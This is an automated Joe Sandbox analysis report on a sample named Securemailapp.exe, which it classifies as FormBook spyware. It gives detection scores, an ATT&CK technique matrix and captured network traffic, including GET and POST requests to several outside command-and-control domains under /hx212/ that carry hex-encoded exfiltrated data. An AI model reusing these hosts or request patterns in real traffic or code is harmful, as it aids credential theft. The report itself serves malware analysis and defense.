Loading ...

Play interactive tourEdit tour

Analysis Report Securemailapp.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:219536
Start date:01.04.2020
Start time:16:46:53
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 13m 9s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Securemailapp.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:20
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@10/11@22/9
EGA Information:
  • Successful, ratio: 33.3%
HDC Information:
  • Successful, ratio: 52.7% (good quality ratio 50.2%)
  • Quality average: 72.3%
  • Quality standard deviation: 28.9%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 48
  • Number of non-executed functions: 248
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, MusNotifyIcon.exe, svchost.exe, UsoClient.exe
  • Excluded IPs from analysis (whitelisted): 40.90.23.154, 40.90.137.120, 40.90.137.124, 51.143.111.7, 2.18.68.82
  • Excluded domains from analysis (whitelisted): umwatson.trafficmanager.net, fs.microsoft.com, lgin.msa.trafficmanager.net, login.live.com, e1723.g.akamaiedge.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com
  • Execution Graph export aborted for target chkdskuda.exe, PID 2976 because it is empty
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through Module Load1Registry Run Keys / Startup Folder1Process Injection512Software Packing11Credential Dumping1Security Software Discovery31Remote File Copy3Man in the Browser1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaGraphical User Interface1Port MonitorsAccessibility FeaturesDisabling Security Tools1Network SniffingFile and Directory Discovery2Remote ServicesData from Local System1Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureSystem Information Discovery23Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information3Credentials in FilesVirtualization/Sandbox Evasion4Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol14SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasquerading11Account ManipulationProcess Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion4Brute ForceRemote System Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection512Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionDLL Side-Loading1Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Securemailapp.exeVirustotal: Detection: 64%Perma Link
Source: Securemailapp.exeReversingLabs: Detection: 46%
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000002.00000002.623997254.0000000000D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.623674502.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.622710007.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sampleShow sources
Source: Securemailapp.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 2.2.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then pop edi2_2_004140D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then pop ebx2_2_00405465

Networking:

barindex
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=yuATxVRg6V03zt9fmkHVG7SVgWpl6/Z6tDeIEtza45Xi+B/vKHFgBV6ZVx3ahKEkFxT0&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.your-date-here.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=chNEXokLq7hW8HvKkY2dcNEQeJ5GKWGLAWl1+X6aOcyDV8302CPyRRACxVQRPL3iiqaQ&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.agaroseresins.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=2H5oEqApcZqqJ6qLyjFERWiUI7bCbufBKCMghUsAFeTsJ5P0iZtpaBZczhNc8rDwu6V1&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.cszlhz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=bM4Xun1pI6ZOV5ZHYseigAPkvvck2Cij1ewApu5ohFDlZ8aGsxAg5ufu1RC6vK+1jaDm&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.skylineluxuryhomeschicago.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=8sUyA4WO5fe1gCDgOO3DHmlO4MdYzsfah5NcuQxOl3hW/0/R9dWPAXciXHbnM6Y/IAid&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.covpsychiz.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=sml3n6l49EPSCa7vMPh/SuuWi1599qVmQUcMIo3tt8Fu8A6Qgu0IlzGyXmIb1Url3LIn&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.thescarfhut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=ZsyByF5b0EkK3lQ42YrSke2rzN/49RgUkpyRf/X/Lp8mJH7kxaV2xoRALuGc5Mm0xYDM&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.artysancr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=wKfpUO9plDGv2T++KqO84WhM5OOWvYWxYhu9D8K5Zh6fySGSwmXnDP6Ufhr7dtYnSq9Q&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.ardrome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /hx212/?Ev=7w0YytMHoI4nsjP+y0IMrc86PWQ/iAHGw4E6AnUW3tdwa4iK0mJdGm+TIKrUlQMYe/Zk&ljo=MDKPFFDXDxJXypBP HTTP/1.1Host: www.xn--u9j813lsxe15po01b.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /hx212/ HTTP/1.1Host: www.agaroseresins.comConnection: closeContent-Length: 168668Cache-Control: no-cacheOrigin: http://www.agaroseresins.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.agaroseresins.com/hx212/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 45 76 3d 55 44 42 2d 4a 4e 42 57 70 4d 51 77 6c 47 36 33 30 34 6e 62 48 74 4d 50 5a 37 74 4a 45 31 43 4b 56 54 38 78 6b 58 71 57 50 63 4b 31 46 76 75 70 34 67 43 2d 65 42 52 67 69 54 59 77 47 36 44 34 28 39 69 32 67 44 30 66 46 38 7a 6e 79 75 45 71 49 66 69 4b 69 78 52 33 49 48 6d 36 78 4c 72 55 33 62 65 39 76 43 73 36 51 6b 73 4d 32 5f 39 6e 78 55 6c 53 41 37 36 6f 71 5f 51 4d 53 50 77 66 36 62 38 74 69 77 38 35 44 6f 59 44 46 70 43 77 6f 4b 64 51 39 64 28 44 39 30 4f 67 39 63 33 54 53 7a 42 32 45 46 76 45 4b 45 50 42 42 66 44 65 70 33 69 51 6b 51 53 31 34 38 44 4e 42 34 4a 74 44 77 35 37 5a 71 74 68 74 43 65 77 43 49 38 48 6e 4e 39 44 58 6e 61 48 4b 50 78 45 47 76 33 50 6b 6f 79 75 35 56 33 6a 4c 76 38 6f 4e 79 5a 43 48 53 62 31 38 32 64 52 6c 41 37 33 33 33 28 74 49 30 34 52 4d 38 71 76 64 6e 54 38 38 55 59 69 77 44 34 71 41 45 39 6d 38 52 50 59 31 65 4e 36 55 7a 52 79 76 38 71 4d 35 55 41 41 62 57 52 65 51 6d 55 4f 66 59 6d 7a 64 47 34 41 33 45 58 32 55 49 64 51 7e 6b 4d 31 4b 68 50 75 47 4a 6b 6a 45 43 63 65 69 52 6e 5a 61 51 6f 41 33 42 6f 4d 46 4b 32 52 44 72 68 4a 52 38 42 4c 66 30 73 51 62 4d 44 5a 7a 6e 63 72 6a 5a 53 31 58 58 4f 66 44 76 63 69 30 41 28 7a 30 6a 64 2d 79 54 4b 79 7a 65 6b 57 42 32 72 70 6b 55 71 46 6a 71 45 50 50 53 55 4f 52 67 41 6b 61 72 56 59 28 30 68 64 48 4b 46 6c 4d 78 50 75 7a 77 36 64 59 6e 45 61 35 38 66 65 51 47 44 4c 39 44 75 4a 46 30 57 76 41 66 30 49 33 7a 68 6d 59 50 6a 4e 36 65 66 6b 4f 55 74 39 4f 46 68 49 7a 59 7e 65 51 67 58 50 55 49 6e 4b 42 46 74 72 4b 75 69 6c 68 62 68 46 4e 36 64 45 44 6e 41 4f 51 32 59 74 33 6f 6e 41 4c 56 43 6b 66 46 52 58 57 45 43 4c 47 35 46 6e 4b 32 68 56 69 78 4a 35 4e 48 31 62 53 39 67 72 54 55 37 54 7a 46 44 62 4d 2d 5a 34 69 72 73 42 49 39 33 6e 47 76 68 41 28 78 6a 33 64 30 74 70 4f 52 57 77 49 31 66 76 55 78 6b 62 66 33 78 6a 6e 35 66 34 76 58 37 6e 66 46 57 75 30 61 79 4e 58 61 50 6a 53 71 6f 68 4b 69 46 43 71 61 34 4a 30 41 67 72 46 67 42 7a 68 48 62 38 35 62 4f 4a 4a 66 39 43 4d 33 50 4b 50 5f 28 42 76 70 56 6e 4c 55 4c 57 35 35 71 58 46 65 75 71 7e 75 57 73 39 47 68 55 54 62 45 41 42 5a 53 32 77 6c 7e 36 78 63 68 73 77 64 61 42 42 57 49 73 48 68 31 55 5a 6d 59 43 76 55 6a 56 32 5a 6d 4e 34 37 43 65 70 63 61 45 28 67 6b 68 65 75 6c 66 47 70 45 68 41 79 35 57 69 42 6c 37 65 38 77 4f 61 68 62 63 54 55 31 47 4f 6f 65 34 51 35 38 73 33 5a 41 42 78 37 71 5f 67 7a 58 4b 4d 34 4a 54 6d 64 56 43 45 6d 6f 66 4e 76 6c 59 69 72 70 75 34 4f 49 6f 73 51 71 39 7a 77 4f 5f 5a 77 36 45 65 48 6e 50 37 6d 57 32 5a 61 68 5a 30 43 64 4c 6f 41 53 34 6f 51 59 2d 4f 53 30 75 6c
Source: global trafficHTTP traffic detected: POST /hx212/ HTTP/1.1Host: www.cszlhz.comConnection: closeContent-Length: 168668Cache-Control: no-cacheOrigin: http://www.cszlhz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cszlhz.com/hx212/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 45 76 3d 7e 6c 31 53 61 4b 68 55 42 64 54 64 58 64 37 4b 6d 6c 67 62 44 52 6a 31 4f 35 54 66 64 36 4c 4c 62 79 56 63 34 56 6b 65 4c 65 62 4e 47 59 44 6b 75 61 77 45 51 6c 41 5f 77 54 52 77 37 59 54 33 6a 64 68 78 71 68 77 53 37 6d 36 56 68 34 6a 30 6e 55 75 4f 58 48 58 5f 6c 4d 56 4a 41 6b 61 68 50 4b 58 2d 75 32 55 54 79 6e 51 57 46 46 75 45 77 67 67 43 43 51 43 6b 61 32 56 59 7a 5a 39 66 4c 79 33 59 51 45 44 61 71 70 5a 6a 37 50 7e 72 52 4d 49 56 4a 38 42 70 72 7a 70 64 39 59 52 32 7a 72 77 6f 42 71 76 6e 6b 34 28 70 4b 48 36 36 53 62 63 6b 4c 39 5a 70 57 77 7a 50 68 7a 47 68 42 4c 7e 4b 58 31 7e 67 34 4d 4a 6f 4f 49 39 66 6b 6f 68 44 4b 49 42 35 55 6d 4f 50 34 78 57 71 37 46 57 79 57 39 74 5f 78 73 6d 75 73 35 7a 30 4a 69 70 53 55 47 61 32 30 76 39 41 77 38 53 6c 7e 69 4b 78 7a 33 6a 77 56 78 59 74 4b 4b 77 5f 35 4e 45 61 35 45 39 42 53 48 38 59 56 47 7e 4b 38 4b 46 4f 45 57 6f 68 58 75 63 33 79 73 6c 6b 66 4e 63 53 78 36 79 6b 55 58 71 4c 44 57 4c 6c 62 34 48 37 6f 7a 30 64 59 69 64 79 5a 2d 6d 4e 69 64 7e 6f 31 51 43 4a 59 6b 49 4f 44 67 31 35 59 72 31 76 78 53 68 50 6e 4e 7e 6a 63 77 59 36 36 68 6d 39 4f 49 63 4d 52 67 50 6e 6f 39 37 39 52 6f 33 4f 7e 51 7e 45 6d 6e 36 39 4b 78 6f 2d 4f 4b 68 33 32 4f 56 53 69 51 71 35 45 32 4b 5a 38 6e 69 30 46 6a 45 64 4f 72 37 63 7e 6d 31 63 39 30 57 33 74 52 59 36 30 50 31 69 38 33 68 7a 7a 7a 33 2d 6e 4f 6e 46 4e 35 6f 63 69 54 68 55 4e 54 51 74 75 31 58 6c 42 30 45 4d 4f 4f 30 33 33 41 6e 4f 77 52 57 48 44 4b 54 39 4a 58 28 55 68 41 64 5a 32 57 57 4e 30 56 35 58 4a 46 6c 52 43 76 56 7a 4b 59 34 57 62 47 4c 61 49 71 79 48 41 6d 47 67 52 54 76 71 77 42 53 72 49 56 47 52 52 2d 7e 57 7a 71 33 68 49 2d 73 76 57 51 50 2d 63 35 50 35 64 44 4c 51 7e 64 69 66 6f 4b 4e 61 71 34 43 4e 68 6b 4e 76 61 5f 28 33 51 38 45 57 75 47 6f 37 34 53 67 62 67 55 33 50 6f 50 63 2d 48 56 41 49 30 75 47 6d 54 44 45 36 4b 34 28 71 48 54 57 30 4d 44 79 37 78 72 74 68 61 45 30 57 4f 4d 4b 50 75 52 32 62 31 71 5a 41 39 6c 45 53 48 47 61 66 43 36 30 74 56 4b 63 76 28 35 63 5f 71 35 70 4e 55 63 44 64 69 54 43 32 61 61 34 62 5a 67 48 41 69 6a 67 4d 6c 67 48 38 63 74 72 49 72 33 4a 71 59 44 4a 45 6d 75 4e 62 36 56 7e 64 64 56 78 32 70 32 65 34 6d 4e 37 65 36 61 43 47 6e 71 58 77 5a 41 7a 34 69 52 65 59 6b 53 79 6e 4b 4a 64 73 39 53 48 64 31 4a 6d 66 72 72 4e 6c 78 63 32 74 68 65 67 53 55 49 7e 4c 77 78 63 4b 38 76 65 34 30 4c 6c 65 7a 4f 30 59 42 6a 6a 43 59 4b 4b 39 73 33 77 63 31 48 7a 33 58 70 71 70 77 72 58 67 53 50 55 38 55 6f 4c 31 69 66 30 38 4d 73 56 6f 39 44 39 43 52 53 4c 70 75 6e 64 58 49 55 64 6f 6a 46 62 77 33 4a 45 6b 78 59 74 66
Source: global trafficHTTP traffic detected: POST /hx212/ HTTP/1.1Host: www.skylineluxuryhomeschicago.comConnection: closeContent-Length: 168668Cache-Control: no-cacheOrigin: http://www.skylineluxuryhomeschicago.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.skylineluxuryhomeschicago.com/hx212/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 45 76 3d 54 75 30 74 77 43 55 52 56 73 38 4e 49 70 41 47 47 4d 4c 57 39 6d 7e 47 6a 64 45 5a 30 43 75 46 70 36 6c 64 28 4e 4d 5f 76 58 4b 5f 66 39 71 2d 7e 54 74 33 35 72 6d 70 6e 41 57 38 76 6f 75 50 28 4e 36 37 34 6d 4d 4b 73 4b 79 4a 31 4c 51 77 37 69 70 52 36 55 33 34 6b 56 36 79 66 77 6b 6e 50 58 52 44 71 30 45 43 71 4b 46 5f 4f 53 37 4a 39 43 77 6b 76 54 48 69 38 6f 79 5f 37 61 67 5f 56 43 70 6f 4e 76 5a 4f 5a 41 56 55 69 4d 35 44 31 67 46 41 59 38 28 7a 64 55 44 72 51 65 79 37 65 78 44 4f 38 48 75 6a 33 6a 33 41 35 4f 39 52 57 53 7a 56 69 61 71 53 6b 48 53 4e 68 32 59 75 33 7a 70 4c 61 79 38 37 47 32 4e 4e 50 5f 7a 62 52 32 51 47 7e 47 52 58 35 59 6d 6d 4a 43 56 7a 44 44 4c 50 7a 2d 74 4d 4d 65 59 4e 43 70 35 49 59 73 32 45 42 67 42 31 62 38 32 49 56 71 78 34 50 36 78 72 59 36 71 35 68 56 73 79 35 70 4f 61 30 44 7e 66 77 6a 79 6e 30 46 63 59 31 70 44 77 57 70 35 32 64 49 4c 77 52 51 4c 6e 75 43 78 72 77 38 42 5a 28 7a 4a 41 57 4b 58 4c 63 33 71 4a 46 67 4d 33 70 43 62 61 32 34 50 32 4e 4d 46 45 39 47 53 45 34 44 75 39 52 59 6d 51 59 70 62 67 59 7a 6e 49 45 73 71 30 66 39 72 68 4a 4d 44 6e 58 48 73 63 49 43 51 79 52 6b 6f 39 4e 30 44 66 4a 2d 36 6a 4b 78 6a 73 53 62 67 41 6f 77 61 4e 4f 37 36 79 74 54 38 36 70 2d 69 68 64 35 34 37 44 6c 74 5a 43 47 50 44 43 4c 77 59 52 53 46 71 36 34 6c 52 30 32 68 50 38 39 55 68 63 75 78 58 43 36 77 43 72 52 33 52 69 4b 66 5a 45 56 76 76 79 43 42 4d 50 2d 42 5f 46 62 4d 51 4d 68 30 68 36 79 64 6d 4f 59 4e 39 33 69 6a 4a 6c 66 4b 55 6c 4b 43 5f 48 73 36 6e 48 63 62 4a 51 39 6c 53 76 55 61 45 48 48 34 35 75 77 63 30 77 48 4b 4a 77 49 61 74 36 71 55 57 67 49 32 69 79 34 4c 7a 43 41 67 43 38 33 6c 46 41 56 4f 39 78 31 57 4e 75 6b 38 7a 59 52 58 30 28 4f 4c 38 61 55 46 6f 38 49 56 4a 7e 5f 73 4a 44 38 7e 54 30 4e 41 70 7a 72 68 67 37 59 6f 58 50 46 34 4d 4c 52 51 5f 35 47 6a 59 33 58 58 30 6c 54 6d 35 52 33 53 64 46 78 76 48 70 67 56 53 7e 73 61 4e 63 50 79 44 36 50 4b 6e 6d 2d 4e 4c 34 49 58 51 37 35 73 6b 4d 79 30 49 46 58 28 47 75 43 64 54 6c 2d 55 6a 28 73 64 65 55 49 64 6e 4f 6a 53 47 77 35 6d 48 75 4c 4e 4a 39 75 55 32 50 68 47 38 68 78 70 33 52 78 76 34 78 64 45 50 72 73 74 70 45 57 65 79 44 74 70 67 47 75 69 35 51 6d 36 62 47 43 4a 5a 64 52 62 34 50 6a 4c 35 75 39 69 70 43 46 34 64 64 34 73 45 7a 38 46 38 33 35 50 69 72 4f 38 73 33 58 48 56 39 32 69 74 31 37 62 78 4e 56 68 75 4f 62 55 2d 6e 49 64 36 37 61 71 68 4e 7a 47 52 77 6e 6c 56 54 67 66 39 59 31 51 77 75 58 31 61 55 34 48 67 6c 42 68 36 30 32 35 68 65 45 47 69 62 41 67 2d 6f 69 50 4d 57 4a 64 47 66
Source: global trafficHTTP traffic detected: POST /hx212/ HTTP/1.1Host: www.covpsychiz.infoConnection: closeContent-Length: 168668Cache-Control: no-cacheOrigin: http://www.covpsychiz.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.covpsychiz.info/hx212/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 45 76 3d 30 4f 59 49 65 59 66 49 38 66 37 47 30 67 32 65 50 72 69 49 46 6a 52 61 7a 63 35 7a 34 76 57 59 6c 65 34 68 77 79 52 46 72 53 73 53 33 31 7a 49 39 73 48 68 44 53 78 46 44 55 50 74 44 65 55 32 42 48 36 4a 41 62 56 36 55 31 49 41 36 2d 36 52 51 73 62 49 4e 76 66 43 32 6f 34 4f 65 64 4c 73 43 4b 6d 4b 4a 5a 50 59 74 64 70 79 35 47 70 63 58 72 41 66 78 70 6f 47 46 41 6f 54 78 6c 77 66 78 56 52 78 56 51 28 74 52 6f 68 59 4b 67 31 46 72 75 66 42 58 38 64 51 52 76 4b 30 4b 75 65 75 50 6c 4b 4e 68 78 47 47 4f 54 58 56 6b 59 55 61 30 34 7a 7a 54 56 72 6c 6a 76 54 6e 62 31 30 39 4d 77 73 42 53 35 46 4a 47 72 65 42 33 69 45 67 4e 32 65 58 4e 61 4d 78 72 6d 37 46 67 33 36 35 57 78 6f 42 58 66 35 76 77 32 61 65 69 68 36 6b 49 35 34 77 61 55 4e 66 4e 76 66 79 58 78 39 61 79 59 6f 72 66 63 31 5a 65 47 66 51 58 31 62 35 39 45 64 55 66 77 36 41 4d 4c 45 58 6f 37 73 37 47 4b 58 63 62 44 32 4c 4f 4b 6e 50 7e 33 54 43 58 39 66 4c 49 7a 5a 64 36 36 78 5a 39 62 48 74 4f 6e 6c 6e 50 35 58 4b 64 66 39 78 49 6c 51 6d 79 58 51 72 73 33 66 43 70 77 44 66 67 50 79 70 65 4f 4c 6c 6e 32 53 54 5a 4d 59 33 4f 45 75 6d 49 48 51 79 38 2d 57 75 59 7a 57 68 51 4e 31 4e 66 35 49 76 44 34 47 34 63 6b 62 62 4d 45 74 44 61 41 30 35 53 7a 58 4d 67 68 64 72 61 53 49 52 76 4e 46 51 6f 67 4d 54 34 32 4d 75 66 32 62 46 58 41 46 54 56 42 74 4c 6b 36 61 74 63 46 32 72 38 52 44 79 35 50 31 65 6f 62 61 30 31 33 70 6a 46 68 5a 52 74 4e 62 72 79 53 79 48 57 4a 7e 68 59 38 4b 59 49 78 4d 6d 43 2d 65 30 4a 32 30 4f 69 71 6e 4b 62 39 33 6e 47 4e 34 42 73 30 55 49 79 4b 7a 66 51 32 6e 5a 71 52 4a 53 4e 70 55 75 31 7a 37 55 61 44 41 74 4e 35 39 58 6c 57 43 37 52 4a 42 45 33 4f 65 42 53 69 61 71 28 6e 7a 68 41 66 7a 65 28 53 66 56 48 36 59 44 66 36 46 39 79 73 6f 38 6e 67 76 75 28 7a 72 31 64 65 78 70 28 54 6c 6b 42 36 36 72 7e 69 61 74 51 55 41 69 4d 46 51 38 58 69 77 4c 58 50 59 74 66 72 55 46 33 6f 44 42 4e 31 67 65 72 78 50 34 72 6b 68 39 56 4e 31 65 36 42 73 42 5a 50 31 39 61 30 6d 53 76 72 65 30 63 79 37 38 6e 53 71 54 73 78 77 6d 4b 79 43 66 7a 73 77 30 58 44 4f 36 70 30 66 43 4c 7a 38 69 48 70 39 49 63 54 56 52 34 6d 32 68 55 70 75 5f 65 68 4a 76 75 52 6a 2d 59 63 4d 48 45 67 6a 74 73 51 54 71 6d 6b 30 58 73 6e 61 66 6d 57 6d 79 69 41 44 49 69 32 37 36 55 65 4b 39 6e 6f 38 35 7a 61 5a 79 6c 69 65 53 37 4f 73 32 65 2d 77 6b 55 46 58 54 70 72 32 74 46 75 55 53 4f 69 39 51 57 64 74 67 36 4b 41 67 47 4e 63 48 62 68 46 6c 5a 64 6e 64 6e 6f 6c 6d 55 65 4e 64 47 2d 57 6f 4a 6c 52 62 4d 4b 42 58 7e 51 37 50 4d 7a 4f 55 36 51 66 77 78 30 48 4a 53 72 4e 6c 32 31 63 49 65 52 67 6c 34 67 59
Source: global trafficHTTP traffic detected: POST /hx212/ HTTP/1.1Host: www.thescarfhut.comConnection: closeContent-Length: 168668Cache-Control: no-cacheOrigin: http://www.thescarfhut.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thescarfhut.com/hx212/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 45 76 3d 6b 45 70 4e 35 65 41 67 32 51 79 4f 57 62 6a 71 4f 6f 34 42 49 4a 4b 67 31 55 5a 55 33 59 46 66 43 7a 4a 30 51 50 44 74 73 38 49 73 79 69 32 76 71 4d 42 4c 31 6b 62 33 44 58 51 5a 70 57 6a 6b 28 62 30 30 6d 4f 4d 42 66 56 71 5f 75 79 30 56 42 4e 56 64 43 2d 6b 5f 32 4f 7a 73 45 5a 37 6a 32 4e 6f 52 33 35 36 42 6e 55 52 53 65 74 6a 65 55 5a 47 54 63 67 49 5f 45 48 57 34 44 45 34 4a 53 32 30 45 54 43 52 30 64 36 6f 31 49 76 61 35 63 72 30 4c 65 53 6b 68 37 67 55 78 48 62 52 56 63 70 33 63 4e 74 67 4d 68 36 42 45 79 7a 66 33 34 6a 54 51 7e 70 55 6b 79 32 59 62 53 55 33 52 67 76 36 38 5a 78 4c 39 70 33 46 38 77 66 74 36 64 7a 6f 52 35 39 65 4d 4b 72 50 39 5a 34 74 4c 28 65 72 50 77 43 5a 78 4c 48 73 74 53 54 28 63 6d 47 74 47 4b 6f 75 73 4d 67 32 68 28 6f 63 44 39 44 5a 37 43 41 7e 70 6f 43 4d 7a 37 75 68 69 76 38 6b 54 69 53 72 77 6f 47 45 58 34 6d 6a 69 31 61 35 72 6a 6f 33 47 4a 38 75 4e 7e 57 4c 68 5a 36 4d 48 4d 77 62 57 32 45 34 73 67 73 4c 6c 56 30 64 50 43 65 47 4d 43 4a 7e 2d 54 53 56 6c 42 4b 78 2d 70 75 48 49 43 30 63 66 78 6d 54 6c 70 4b 6f 35 50 35 4d 7a 70 4d 50 38 6e 41 69 41 70 53 62 66 72 62 52 4e 57 79 4d 54 74 52 5a 45 6e 6b 30 52 51 32 6a 6d 70 77 75 31 53 6d 4d 43 7e 44 52 30 68 31 7a 6c 76 72 4a 41 77 73 70 42 4b 35 57 56 54 6d 57 6b 49 4a 4e 30 41 41 64 33 4c 42 52 75 43 4d 30 36 48 54 57 35 5a 30 4d 73 53 5f 5a 35 71 37 45 47 52 52 78 48 55 4a 42 77 6b 2d 43 73 54 49 77 69 49 5f 35 7a 75 43 46 70 28 31 32 45 57 6a 61 6c 53 70 7e 2d 4d 48 70 6a 36 59 55 50 62 7a 